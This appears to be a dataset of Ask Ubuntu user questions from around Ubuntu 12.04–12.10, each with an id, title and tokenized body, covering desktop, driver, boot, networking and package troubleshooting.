224727	can not get to login screen , background starts with terminal prompt only	my uncle has ubuntu on his work pc . i came in to work today , and he had lost his unity side bar . i told him start with just rebooting it . he rebooted it ... and now it does not even get to the login screen . it gets to the background with the word ubuntu , and the 6 or 7 dots , does it 's little loading dot thing and then stops , a black terminal then opens on the top left with the background still in place . personally , i think he screwed it up himself . he always swears he did n't touch anything , but i know better ... either way , i ca n't get him back into the desktop to even see if the sidebar is back . he 's always screwing around pressing the wrong buttons on the login screen , hitting admin things and such ... any ideas ?
224740	login takes very long , annoying repaints once a minute when logged in : how to troubleshoot ?	i am suffering from a strange problem with my gnome shell in ubuntu 12.10 . the login takes very long ( > 30 sec ) , with a blank screen . in google chrome and thunderbird ( and perhaps in other applications ) , the main window freezes and is repainted in periodic intervals of less than one minute . the freeze takes several seconds , and it seems that font and appearance of , e.g. , tabs and buttons briefly changes . attempting to enable the second monitor show an error message related to xrandr . everything seems to have started three days ago , after i had to force-shutdown the machine while it was hibernating due to low power . ( it was hibernating for quite a while and did n't want to stop . ) silly me . i have tried the following measures , with no avail : checked all package file md5 hashes using debsums reinstalled all packages using a variant of dpkg -- get-selection \* | xargs apt-get install -reinstall temporarily moved configuration directories such as .gconf , .config and .gnome2 to another location created a new user account when i choose `` ubuntu '' during login , the problems disappear . i am sort of frustrated that reinstalling all packages did n't fix the issue . how to troubleshoot this gnome shell ( ? ) problem , short of reinstalling the system ? ( or did anyone see this kind of behavior on their machine ? )
224742	lost notifications after installing xfce	today i noticed that i do n't see any notifications . is there a way to reset notification settings . it happend after i installed xfce on my ubuntu 12.04 .
224746	my amd switchable graphic card is not recognized	my graphics card is not being recognized . i 'm using ubuntu 12.10 and have the switchable amd ati 6620g and 6600m . i have downloaded the proprietary driver ( amd catalyst 12.10 and 12.11 ) both are not installing giving me a error message saying `` one or more of the reqired tools not found . optionally you can force using -- force . this is not recommended it can make your 3d acceleration unstable '' and recently my computer does not start all it does is give me a message saying `` running in low graphics settings '' and i can not proceed using the enter key so i 'm forced to manually restart . i 'm horribly frustrated and am coming from using windows my entire life and minimal use of command prompt .
224754	how do i redirect playonlinux to a different partition ?	okay ! this sounds kind of hard , but it should be entirely doable . i have ubuntu and windows on the same disk . on the windows partition , i have a game installed ( guild wars 2 , but this should n't matter ) . upon booting up ubuntu , the windows partition is mounted under `` /home/ruben/windows '' . under windows , my game folder would be in `` c : \program files ( x86 ) \arenanet\guild wars 2 '' . so under ubuntu , it 's in `` /home/ruben/windows/program files ( x86 ) /arenanet/guild wars 2 '' . now , because i want to save space , and because i want to be able to access the game from both ubuntu and windows , i want to create a path to `` /home/ruben/windows/program files ( x86 ) /arenanet/guild wars 2 '' for playonlinux . playonlinux , per default , installs guild wars 2 in this folder : '' /home/ruben/.playonlinux/wineprefix/guildwars2/drive_c/program files ( x86 ) /arenanet/guild wars 2 '' so what i want to do is create a fake folder in `` /home/ruben/.playonlinux/wineprefix/guildwars2/drive_c/program files ( x86 ) '' that redirects to `` /home/ruben/windows/program files ( x86 ) /arenanet '' . can this be done ? what i 've tried doing is this : sudo ln -s `` /home/ruben/windows/program files ( x86 ) /arenanet '' `` /home/ruben/.playonlinux/wineprefix/guildwars2/drive_c/program files ( x86 ) '' but it does n't appear to work , as playonlinux gives me errors about not finding the folder . any help would be so much appreciated .
224757	how to save images from web links given in .xls file	i have an xls file which has weblinks of product-images . the number is about 5000 . can you advise me how can i save these images on my computer . given here below is a link just to narrate the example . http : //images.fragrancex.com/images/products/sku/big/1035w.jpg all the images have the same type of links .
224760	highlights in libreoffice writer can not be undone in office word	i am used to making highlights in texts but sometimes after saving the document as .doc i have to open it on a windows os and can not undo the highlight . ( i have n't checked it in word 2007 yet ) is there a solution/workaround to this ?
224765	acpi_listen only detects every other backlight hotkey press	i am trying to get the lcd backlight brightness control to work properly on my new asus g75vw-dh72 laptop in ubuntu 12.10 . i got it to mostly work by following the instructions that i wrote here ( acpi_osi=linux acpi_backlight=vendor , enablebrightnesscontrol=1 ) . however , there are still two issues : the main issue is that i have to press the hotkey ( fn+f5 or fn+f6 ) twice before there is any effect on the brightness , or any output in the acpi_listen command . so if i run acpi_listen and press fn+f6 six times , the output only has three lines : video lcdd 00000086 00000000 video lcdd 00000086 00000000 video lcdd 00000086 00000000 what causes this ? how can i fix it ? this behavior does n't happen in windows . ( also , i noticed that the brightness is incrementing/decrementing in steps of 2 instead of 1 , unless i happen to have a menu open . any advice on that is welcome . )
224766	lost the hard drive icon from the launcher	i unlocked the c drive icon connected to the launcher . once i moved it onto the desktop , it disappeared . in attempting to create an new icon , i was asked to create a mount point . the mount point directory then showed 2 links rather than the normal 1 . i trolled the web for solutions , but i did not find one that addressed any of the stated issues . i attempted to find a solution to reconstruct the hard drives that were found during the install and listed in the launcher but was unsuccessful in doing so . in summary , i would like to restore the /media directory to the original install which listed the drives correctly and have the drive icons appear in the launcher as they did at the time of the installation of ubuntu . i found where all the other icons in the launcher located in the home desktop directory but could not find anything that listed the hard drives or the floppy . ubuntu 12.10 is installed and all the latest updates have been applied .
224769	unity previews takes over 5 seconds to load	i just installed ubuntu 12.10 on my dell xps 15 ( l502x ) and everyting works great , but it does n't really load so fast . when i right click on an icon in the dash it takes 4-10seconds to load the unity previews and i think this is to slow , is there anyway to make it faster ? i have 6gb ram and have a dualquad core so it should n't load so slow ?
224773	how to share folders using oracle , windows and ubuntu	i use my laptop toshiba , 4gig ram , more 40gig free disks spaces and vista home premium 64bits with service pack 2 . i installed oracle vm virtalbox with success , after i installed ubuntu version 8 with success ! i need to transfer files between vista and ubuntu on the same laptop , how i can do that ? can i use samba ? i try to use samba but it is not success ! how i can install samba on ubuntu v.8 ?
224774	with respect to gnome-session , what is a `` component '' ?	under /usr/share/gnome-session/sessions are files which describe the different types of sessions available from gnome-session . in these files is a list of required components , eg for shell : requiredcomponents=gnome-shell ; gnome-settings-daemon ; or for fallback : requiredcomponents=gnome-panel ; gnome-settings-daemon ; this appears to be a list of executables , but it is not . if i change gnome-panel to some other type of panel , the session does not start , and i see the following errors in ~/.xsession-errors : gnome-session [ 2003 ] : warning : unable to find required component 'xfce4-panel' so my question : what is a component , how are they defined , and where does gnome-session look for them ?
224778	reduce memory usage	i have just installed the standard default desktop configuration of ubuntu 12.10 ( quantal quetzal ) . my pc only has 1gb of ram and is struggling a little . what steps can i take to reduce the memory overhead of the standard install ? if it makes a difference , i use firefox , and a terminal most of the time . simply running those two applications i see : free -m total used free shared buffers cached mem : 938 873 64 0 5 167 -/+ buffers/cache : 701 237 swap : 959 158 801
224780	cifs - default security mechanism requested ( mounted share )	the following message appear every time i reboot/boot my ubuntu 12.04.1 cifs vfs : default security mechanism requested . the default security mechanism will be upgraded from nbtlm to ntlmv2 in kernel realese 3.3 i'am searching for a solution , if there is one for this message , i really do n't understand it . following my fstab //192.168.0.10/d $ / /mnt/winshare/ cifs user , file_mode=0777 , dir_mode=0777 , rw , gid=1000 , credentials=/root/creds 0 0 i can use my mounted folder with no problem , i just want to know why this message is appearing and if have something that i can do to fix this problem or hide this warning . thanks john sent a answer , saying to add the option `` sec=ntlmv2 '' , this solved him problem , but unfortunally to me when i try to mount appear `` mount error ( 22 ) : invalid argument '' can anyone help me ?
224785	how to run a local and external website on same computer with 2 nic 's , 2 routers and 3 separate networks ?	hello and hopefully i can get some answers to my question , though i think i 'm making it more complicated for myself than it has to be . my business is a used auto dealership , and i 'm in the process of connecting it to the world - via ethernet from the business server [ running xubuntu ] to the isp 's ethernet router/modem , so that i can host our own website ( no more than 5-10 people probably visiting at any time - mainly paying their bill ) , as well as set up a web based internal-intranet site - via dd-wrt router on the 2nd nic on the business server - that 'll be accessed over wifi from employees personal devices . on the other end of this is trying to offer free wifi to customers that is completely separate of the 2 mentioned above networks . quick rundown : web site for customers to access . i 'm going to use no-ip.org for dns for the moment being , so i 'll have a site that customers can access from anywhere in the world at `` mybiz.no-ip.org '' . this will be forwarded to nic # 1 on the server , possibly at an address like `` 108.69.. '' as its being provided an ip from the isp 's modem/router , that is from time warner , and they allow no ! configuration options . web site for employees to access . i 'm trying not to use the server too much as a desktop , only for critical situations , so having a back-end that 's separate from the front-facing website is critical . this will be the dd-wrt router hard wired into nic # 2 on the server . this wifi will be password accessible . public wifi for customers . the dd-wrt can separate networks if i 'm correct , i just ca n't seem to understand how to separate the 2 and still have internet access on both . i 've done it before , but the `` public '' wifi ( with no password set to connect ) kept dropping the connection like a problem was happening that i could n't figure out . so , if i could do a little drawing , this is how it would/should possibly look : isp -- > [ sends public facing ip of 108.69 . *.1/8 ] -- > isp modem router isp modem router ( ethernet only ) -- > [ gives private ip 108.69 . *.2 ] -- > server nic # 1 server nic # 1 -- > [ gives private ip 108.69 . *.3 ] -- > dd-wrt router dd-wrt router -- > [ dhcp enabled giving ip 's 172.16.0.0/16 ] -- > employees network | | -- -- -- -- - > [ dhcp enabled giving ip 's 192.168.1.0/24 ] -- > public wifi hope it 's not too confusing , but if anyone could give me some good direct tutorials on how to accomplish this , or if you know , then it 'll be a lot of help . if you need any further information - do n't hesitate to ask ! using the lamp stack with webmin/virtualmin customer site is located in /var/www2/ private employees site is located in /var/www/ using no-ip.org 's dynamic client updater
224787	is there a way to save the changes of tools bars in libreoffice writer ?	i 'd like to know this ... becuase in the near future i might wan na export the changes i have just made to libreoffice writer and import those changes to another computer . is there a way to do this ?
224788	error : no such partition help !	ok so i had ubuntu installed on dual boot with windows 7 , i decided i liked it , btu i did not want the dual boot option so i decided to uninstall it . no whenever i turn on my computer the `` error : no such partition '' screen shows up and i cant do anything at all . i tried restarting it and booting from a windows recovery disc to fix the mbr but my bios no wont load i cant change the boot order i cant manually boot or anything , it just goes straight to the `` error : no such partition '' screen . can someone please help me ?
224789	is there a debian/ubuntu policy on softlinking things to another location in opt once they 're installed ?	is there a debian/ubuntu policy on softlinking things to another location in opt once they 're installed properly in usr/share or usr/lib ? here 's a simple example : packaging up dnsenum . it 's a really simple package ( 4 files ) . a perl script , two wordlists , and a readme . so from what i gather : the wordlists should go in usr/share/dnsenum/* the perl script itself would go in usr/lib/dnsenum/ the readme would go in usr/share/doc/dnsenum/ add a wrapper bash script that goes in bin and just passes arguments to dnsenum.pl . the question is this : if there are various tools that provide wordlists or some other shared resource , is there a policy on linking all the wordlists from different packages in to /opt/wordlists/ ? it seems like the `` right '' thing to do respecting the directory structure while still making things convenient .
224791	how do you adjust screen brightness on acer laptop ?	i have an acer aspire one 5742 laptop . i installed linux ubuntu 12.10 on it . i have one problem with it . no matter how i press the fn+↑ or fn+↓ keys i can not adjust the screen brightness . it is at its maximum brightness and this drains the laptop battery . i did some googling and found out that you needed to change some settings in the grub file but i do n't know exactly what to do . can anyone help me ?
224794	is it possible to remove prompt on startup	i recently installed ubuntu on a flash drive . the intent was to use ubuntu when the usb is inserted and windows when it is not . but now i receive a prompt asking me to choose the operating system i want to boot , even when i have no usb inserted . it 's redundant and unnecessary . is there a way to remove that so that it loads ubuntu when it is there and windows when it is not , like it is supposed to ?
224795	losing audio over hdmi after wake from suspend and reboot	running a custom htpc with : intel i5 3750 ( ivy bridge ) with hd 4000 graphics . asrock z77 pro4-m motherboard ubuntu 12.10 when the system is up and running , i 'm able to connect an hdmi cable and successfully deliver audio to the hdmi device without incident . the output tab under sound settings allows me to select between 5.1 an 2 channel audio modes . when i resume from suspend , audio is gone , but everything appears to be the same under sound settings . when i reboot the system , the mode options are no longer available and audio is broken . i 've discovered that disconnecting the cable , rebooting the system , and connecting the hdmi cable to a running system will allow me to resume sending audio over hdmi . but as always , audio is lost with reboot or wake from suspend . what can i do to fix it ?
224797	install of wine1.5 on ubuntu12.04 hangs at the microsoft font eula	during the install of wine 1.4 or 1.5 , a microsoft font package is installed , after you ok the eula . i am unable to get a response by clicking on or the enter key . the installation hangs there waiting on a response . what can i do to get past this point ? noobe thanks in advance . dwbrayton
224799	ubuntu 12.04 on dell mini 9 : direct me to screen aspect ratio directions ?	can someone direct me to an existing discussion , if there is one , about how to install the right aspect ratio or screen resolution on my dell mini 9 now that i have ubuntu 12.04 ? all the discussions i see are for other hardware . i am not so surefooted with terminal commands in general , though i was able to install the os , so i am not terrible either . but what i have found is that if it 's not for my machine , it wo n't work . the only option i have now is 800x600 . i do n't so much care about the resolution sharpness as the aspect ratio , which is too wide ( that is , everything looks wide ) . thanks !
224803	python-speechd ?	i just upgraded to ubuntu 12.10 , am fooling around with some python code . in earlier releases , i used to be able to do : import speechd and now i get that the module does not exist . it also tells my the following when i try to install python-speechd : package python-speechd is not available , but is referred to by another package . this may mean that the package is missing , has been obsolete , or is only available from another source e : package 'python-speechd ' has no installation candidate . what should i do ? i 'd like to keep using speech-dispatcher if i can . https : //live.gnome.org/orca/speechdispatcher says that i should try to install python-speechd , which does n't work . thank you in advance - i searched everywhere but i could n't find anything . edit : i did a little digging , and this seems to be an issue with python 2.7 , since python3-speechd is installed but not python-speechd . the following works : python3 -c `` import speechd '' but this does not ( ca n't find module speechd ) : python2.7 -c `` import speechd '' it would be great to get this working with python 2.7 . second edit : i tried installing python-speechd from here : https : //launchpad.net/ubuntu/quantal/i386/python-speechd/0.7.1-6ubuntu3 but it said that it 's installation conflicted with python3-speechd .
224810	can not authenticate to isa proxy with apt-get running on ubuntu 12.04 running likewise for domain auth	i have a hp workstation running ubuntu 12.04 . i have installed likewise and joined it to the corporate domain at my work . i have set the proxy settings in system - > network - > network proxy and applied system wide . i can browse the web no problem however apt-get fails with an isa authentication failure . i have modified the /etc/apt/apt.conf file from acquire : :http : :proxy `` http : //proxy : port '' to acquire : :http : :proxy `` http : //domain\user : password @ proxy : port '' but i am still getting an authentication error . i have changed the password a few times , and used different accounts to the same affect . i also ran sudo http_proxy=http : //domain\user : password @ proxy : port/ apt-get update but the same issues occurred . any help would be appreciated
224811	installed correctly , wo n't boot up or give me the option	i have installed ubuntu on a partition of my main hd . everything went great . however it boots windows 7 up without giving me the option to boot up ubuntu . the partition is healthy , according to my computer management . how do i get the option to boot the partition ?
224812	collecting data , saving it into a file and rerun it again in bash script ;	i 'm new to bash and have written this script to collect data then save it to an automated file . it runs fine til here but as i try to rerun the script to add another details it gives me errors . # ! /bin/bash # this program helps the user to collect contact details . clear options= '' add_user end_session '' echo `` 1 . add another user '' echo `` 2 . end session '' echo -n `` enter selection : '' read selection echo `` '' select opt in $ options ; do if [ `` $ opt '' = `` end session '' ] ; then echo done exit elif [ `` opt '' = `` add another user '' ] ; then echo `` dear , user . this script will help you to collect data from people . '' echo `` type the name : '' read name echo `` type the age : '' read age echo `` type the address : '' read address echo `` type the gender : '' read gender echo `` type the phone number : '' read phone number echo `` type the email : '' read email echo `` full details '' echo `` $ name '' echo `` $ age '' echo `` $ address '' echo `` $ gender '' echo `` $ phone '' echo `` $ email '' echo `` name : $ name '' > > datacollection.txt echo `` age : $ age '' > > datacollection.txt echo `` address : $ address '' > > datacollection.txt echo `` gende : $ gender '' > > datacollection.txt echo `` phone number : $ phonenumber '' > > datacollection.txt echo `` e-mail address : $ email '' > > datacollection.txt else clear echo bad option fi done
224814	repositories added for `` maya '' not `` precise ''	i wanted to test cinnamon in my xubuntu 12.04 . after installing it , when i try to add a ppa it is added for `` maya '' not `` precise '' . i purged cinnamon ppa but it is still the same ... what can i do about it ? ps poking around i guess i should edit /etc/lsb-release but could anyone post its default content ?
224816	tried to use xdmx and now i ca n't log in !	i was following the instructions on here : extend desktop to monitor over lan and ran startx -- /usr/bin/xdmx :1 +xinerama -display :0.0 -display localhost:10.0 -norender -noglxproxy on my new laptop over ssh with my old laptop as the client . this was meant to let me use my old laptop screen as an extended monitor . it did n't work and all i got was a mouse on a black screen on my new laptop , so i restarted it but now i ca n't get past the login screen . i tried uninstalling xdmx , openssh-server and even reinstalling xserver-xorg but nothing has helped . please help !
224819	does spotify work for 12.10 ?	as per title , does spotify linux preview work for 12.10 ? if so , are there any ad-blocking software that will work for it ?
224820	trouble setting monitor resolution higher than 1024x768	i just installed ubuntu 12.10 ( 32bit ) and everything seems to be working fine with the exception that the only resolutions that the display settings dialog allow me to set are 800x600 and 1024x768 . i 'm using a computer with intel integrated graphics chipset 945g , and benq t71w monitor which is capable of running 1440x900 ( which is the resolution i want ) . other system information that may be relevant : the processor is intel core2 duo cpu e4500 @ 2.20ghz ă 2 and the system has 994.9mb of memory . in case more information is needed , this is some of the output of `` lspci -v | less '' : 00:00.0 host bridge : intel corporation 82945g/gz/p/pl memory controller hub ( rev 02 ) subsystem : intel corporation 82945g/gz/p/pl memory controller hub flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 82945g/gz integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : biostar microtech int'l corp device 3103 flags : bus master , fast devsel , latency 0 , irq 16 memory at fde80000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at ff00 [ size=8 ] memory at c0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at fdf00000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : intelfb , i915 i 've found that i can use xrandr to set the resolution to 1440x900 , the problem is that the change is not permanent and causes an error message at the next startup . i 've read that i can use xorg.conf to make it permanent but not only i could n't find the file , but i 've also read comments saying that the file is not used anymore and using it was not advisable or something like that . even if the system ca n't seem to identify my monitor , it recognizes it can handle resolutions higher than the ones it allows to use through the display dialog . this is the output of `` xrandr -q '' : screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 so , the question is , how can i solve the issue ? i 'd like to avoid using a script on startup as i 've read that it causes a slowdown . is there a way to make the desired resolution appear in the display dialog and make it stay as a valid option even after reboot ?
224821	why is n't utorrent working ? how do i remedy this problem ?	i tried to install utorrent by following the instructions available at http : //www.liberiangeek.net/2012/01/install-utorrent-in-ubuntu-11-10-oneiric-ocelot/ but when i got to the step of typing : utserver -settingspath /opt/utorrent-server-v3_0/ into terminal i received the output : server started - using locale en_au.utf-8 using locale en_au.utf-8 file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat.new file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat.old file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat.new file not found during integrity check : /opt/utorrent-server-v3.0/settings.dat.old failed file save : /opt/utorrent-server-v3.0/settings.dat.new total physical memory -1 max disk cache 33554432 file not found during integrity check : /opt/utorrent-server-v3.0/dht.dat file not found during integrity check : /opt/utorrent-server-v3.0/dht.dat.new file not found during integrity check : /opt/utorrent-server-v3.0/dht.dat.old file not found during integrity check : /opt/utorrent-server-v3.0/rss.dat file not found during integrity check : /opt/utorrent-server-v3.0/rss.dat.new file not found during integrity check : /opt/utorrent-server-v3.0/rss.dat.old tcp port bind failed 0.0.0.0:6881 : ( 98 ) address already in use file not found during integrity check : /opt/utorrent-server-v3.0/resume.dat file not found during integrity check : /opt/utorrent-server-v3.0/resume.dat.new file not found during integrity check : /opt/utorrent-server-v3.0/resume.dat.old ipv6 is installed and then after a day of it stuck at this point it still had n't installed the utorrent server . i am using 12.10 i386 on a dell vostro 3500 laptop if any further details are required .
224824	package dependencies can not be resolves	when i try to install wine , playonlinux , and some other programs , i get the following message : at the terminal : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . at the software center : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i already tried installing them with `` aptitude '' and failed . i am running ubuntu 12.10 please help ! i 've had this problem for a while now and do n't know what to do !
224826	ubuntu deleted files from guest account desktop	i have ubuntu 12.10 and was using guest account . i downloaded some files on desktop and shutdown my m/c after use . now today when i logged in to guest account to copy those files but surprisingly those files were gone and desktop was clear . i guess ubuntu deletes all files from guest account on shutdown . can you please guide me to recover those lost files . thanks
224827	ubuntu 12.04 taking too much time to boot	ubuntu 12.04 is taking much time for booting , here is the system kernel message while booting .it is showing that some anacron was killed , why ? and how to fix the problem ? [ 2.241047 ] scsi6 : usb-storage 2-1.6:1.0 [ 2.241501 ] usbcore : registered new interface driver usb-storage [ 2.241895 ] usb mass storage support registered . [ 3.240670 ] scsi 6:0:0:0 : direct-access multiple card reader 1.00 pq : 0 ansi : 0 [ 3.241791 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 3.243083 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 12.568641 ] adding 4037904k swap on /dev/sda3 . priority : -1 extents:1 across:4037904k [ 12.615014 ] udevd [ 462 ] : starting version 175 [ 12.651334 ] mei : module is from the staging directory , the quality is unknown , you have been warned . [ 12.655283 ] [ drm ] initialized drm 1.1.0 20060810 ... ... ... ... ... ... . [ 14.118369 ] init : alsa-restore main process ( 982 ) terminated with status 19 [ 14.252595 ] init : anacron main process ( 1033 ) killed by term signal [ 14.285763 ] hdmi status : codec=3 pin=5 presence_detect=0 eld_valid=0 [ 14.285841 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 14.285925 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 14.285991 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 14.615073 ] init : plymouth-stop pre-start process ( 1222 ) terminated with status 1 [ 16.447287 ] wlan0 : authenticate with c0:8a : de:7c:60 : e8 ( try 1 ) [ 16.448858 ] wlan0 : authenticated [ 16.453405 ] wlan0 : associate with c0:8a : de:7c:60 : e8 ( try 1 ) [ 16.456392 ] wlan0 : rx assocresp from c0:8a : de:7c:60 : e8 ( capab=0x431 status=0 aid=2 ) [ 16.456398 ] wlan0 : associated [ 16.457014 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 16.457017 ] ieee80211 phy0 : brcmsmac : brcms_ops_bss_info_changed : associated [ 16.457019 ] ieee80211 phy0 : changing basic rates failed : -22 [ 16.457021 ] ieee80211 phy0 : brcms_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 16.457226 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 16.654196 ] ieee80211 phy0 : brcms_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 17.823565 ] ieee80211 phy0 : wl0 : brcms_c_d11hdrs_mac80211 : txop exceeded phylen 180/256 dur 1946/1504 [ 18.220865 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 26.881422 ] wlan0 : no ipv6 routers present [ 68.228293 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 73.240133 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 76.574490 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 102.180006 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 103.100984 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement ) [ 124.171624 ] ieee80211 phy0 : brcms_ops_bss_info_changed : qos enabled : true ( implement )
224839	need help connecting to the internet but the option to connect to networks is not even listed	i have an acer aspire running windows 7 and ubuntu . i am new to ubuntu so treat me like i know nothing . i decided to install ubuntu so i installed it as a separate operating selectable on startup . when i first got it running it showed up with a little box in the corner that said : `` network : disconnected-you are now off line '' i have tried a number of different things to get it to connect but so far nothing has worked . i can connect to my home network on windows 7 although i can not connect to other or public networks . i have an ethernet cable but that does n't seem to help either . when i click on the network menu or whatever in the top right corner , i only have the options to vpn connections , enable networking and edit connections ... i think that the problem has something to do with drivers but i am not sure . other information : i am trying to connect to the comcast arris router .
224844	ubuntu 12.04 takes long time to show desktop	i am creating an application by customizing ubuntu 12.04 . and i 'm using remastersys to create its backup to be distributed , the customizations are , my application ( java ) installed postgresql ubuntu user ( and password ) user auto login using lightdm user session using gnome-classic ( no effects ) user desktop cleaned-up , i removed all gnome-panel except the last one , empty panel . startup application , python with gtk . root crontab to ensure my application is running ( start it otherwise ) my problem is , on the master computer where i originally developing , the boot sequence is not problem , from bios to show the desktop ( and my startup apps running ) took about 50 seconds . but , after doing remastersys and install it into the other computer , with same specification and same computer model , it takes about 2 minutes ( or even more ) to show the user desktop ( every other thing is replicated fine ) . it boots from bios , and then showing the ubuntu-dots loading , after that it looks like hangs untill about 2 minutes , before the desktop wallpaper shown and my app running ( startup application ) . what have i tried to resolve this on the target computer ( the one installed from remastersys iso ) remove all desktop configuration , such as mv /home/user /home/user.old , mkdir /home/user , chown user /home/user , reboot . this step makes the desktop customization lost and my startup app not running , but still takes about 2 minutes to show the desktop apt-get purge unity unity-2d , still , takes about 2 minutes apt-get purge compiz , no luck . set metacity compositing , no luck . removed root 's cron , no luck . and still , the booting time until the desktop is usable is taking about 2 minutes , compared to its original about 40-50 seconds only . the different is at the moment when the desktop is about to be shown . the ubuntu-dots loading time is about the same . please help on this , thank you .
224847	can i go from 11.04 to 12.10 in 1 step ?	i 'm at a 11.04 and want to get to 12.10. update-manager only offers me 11.10 . do i have to do 3 separate upgrades to get to 12.10 ?
224848	how to make dd make a copy of my ipod 's harddrive into my computer ?	i 'm trying to do this , i 'm sure you do n't wan na read all that then i 'll make a resume on it : a file was accidentally deleted on a ipod4 , i need to recover it and i 've been able to do all the process through ssh and dd . i was using this command : root @ g1 : /home/gustav # ssh root @ 192.168.1.101 dd if=/dev/rdisk0s2s1 bs=1m | dd of=iphone-use2.img root @ 192.168.1.101 's password : write failed : broken pipe 4113088+0 records in 4113088+0 records out 2105901056 bytes ( 2.1 gb ) copied , 51107.2 s , 41.2 kb/s and then i was having this error - i had the error twice , the first time i had it i could make a iso file of ~11gb , the second time i 've made a file of ~2gb . i presume the dd process can stop due to unknown reasons then i had the idea of using the dd to make splits of the ipod 's harddrive . then i 've started to use these commands : ssh root @ 192.168.1.101 dd if=/dev/rdisk0s2s1 of=iphone1.img bs=1m count=1024 ssh root @ 192.168.1.101 dd if=/dev/rdisk0s2s1 skip=1024 of=iphone1.img bs=1m count=1024 ... the problem now is : when i was using the first command , the dd was copying the iso file to my computer , with this second command it 's copying the iso file to the ipod 's harddrive , how can i specify where the output file is going ? i want it copied to my computer , i 'm aware that it may involve some alteration on the of argument but i do n't know how to do it , can you help me ? also , why the first command make a copy of the ipod 's disk to my computer drive and the second make a copy of my ipod 's disk to itself , if the of argument is similar on both ?
224850	indirect rendering issue on 12.04 , using ati driver	i have ubuntu 12.04 64-bit system , when i run glxinfo i see some strange error about indirect rendering and failed to load some lib32/dri/swrast_dri libraries . any idea what is going on ? please let me know if i can enhance the relevant information provided in this question $ libgl_debug=verbose glxinfo name of display : :0 libgl : screen 0 does not appear to be dri2 capable libgl : opendriver : trying /usr/lib32/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib32/dri/swrast_dri.so libgl error : dlopen /usr/lib32/dri/swrast_dri.so failed ( /usr/lib32/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/dri/swrast_dri.so libgl error : dlopen /usr/lib/dri/swrast_dri.so failed ( /usr/lib/dri/swrast_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : swrast_dri.so libgl error : reverting to indirect rendering display : :0 screen : 0 direct rendering : no ( if you want to find out why , try setting libgl_debug=verbose ) server glx vendor string : ati server glx version string : 1.4 server glx extensions : glx_arb_multisample , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group client glx vendor string : mesa project and sgi client glx version string : 1.4 client glx extensions : glx_arb_create_context , glx_arb_create_context_profile , glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_framebuffer_srgb , glx_ext_create_context_es2_profile , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_multithread_makecurrent , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 1.4 ( 2.1 ( 4.2.11762 compatibility profile context ) ) opengl extensions : gl_arb_depth_texture , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_program_shadow , gl_arb_framebuffer_object , gl_arb_imaging , gl_arb_multisample , gl_arb_multitexture , gl_arb_occlusion_query , gl_arb_point_parameters , gl_arb_point_sprite , gl_arb_shadow , gl_arb_shadow_ambient , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 